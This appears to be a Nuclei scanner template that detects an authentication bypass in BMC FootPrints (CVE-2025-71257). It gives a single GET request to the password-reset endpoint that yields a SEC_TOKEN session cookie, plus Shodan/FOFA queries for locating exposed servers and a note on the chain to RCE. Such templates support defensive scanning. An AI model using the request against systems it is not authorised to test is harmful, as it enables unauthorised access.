id: CVE-2025-71257

info:
  name: BMC FootPrints - Authentication Bypass
  author: watchTowr,DhiyaneshDk
  severity: medium
  description: |
    BMC FootPrints versions 20.20.02 through 20.24.01.001 contain an authentication bypass vulnerability in the password reset functionality. Unauthenticated attackers can access the /footprints/servicedesk/passwordreset/request/ endpoint to obtain a valid SEC_TOKEN session cookie without proper authentication. This vulnerability enables exploitation of other vulnerabilities in the chain, including CVE-2025-71258 and CVE-2025-71259 (SSRF) and CVE-2025-71260 (deserialization RCE).
  impact: |
    Unauthenticated attackers can bypass access controls to access and modify application data and system resources.
  remediation: |
    Apply the hotfixes released by BMC on September 2, 2025 for all affected branches. Update to the latest patched version of BMC FootPrints.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
    cvss-score: 6.5
    cve-id: CVE-2025-71257
    epss-score: 0.12542
    epss-percentile: 0.94066
    cwe-id: CWE-287
  reference:
    - https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/
    - https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"/footprints/servicedesk/"
    product: footprints
    vendor: bmc
    fofa-query: body="/footprints/servicedesk/"
  tags: cve,cve2025,servicedesk,bmc-software,auth-bypass,footprints,bmc,vkev

variables:
  string: "{{to_lower(rand_base(8))}}"

http:
  - raw:
      - |
        GET /footprints/servicedesk/passwordreset/request/ HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: set_cookie
        words:
          - "SEC_TOKEN="
# digest: 4a0a00473045022100b689607be9965dc232cbeb811da2dfbb68d610f28bfde1bb10cf88a05a215120022004facef1f37d5a3b879835f308a11049821cd2f206a64199a28640ff8394b1d4:922c64590222798bb761d5b6d8e72950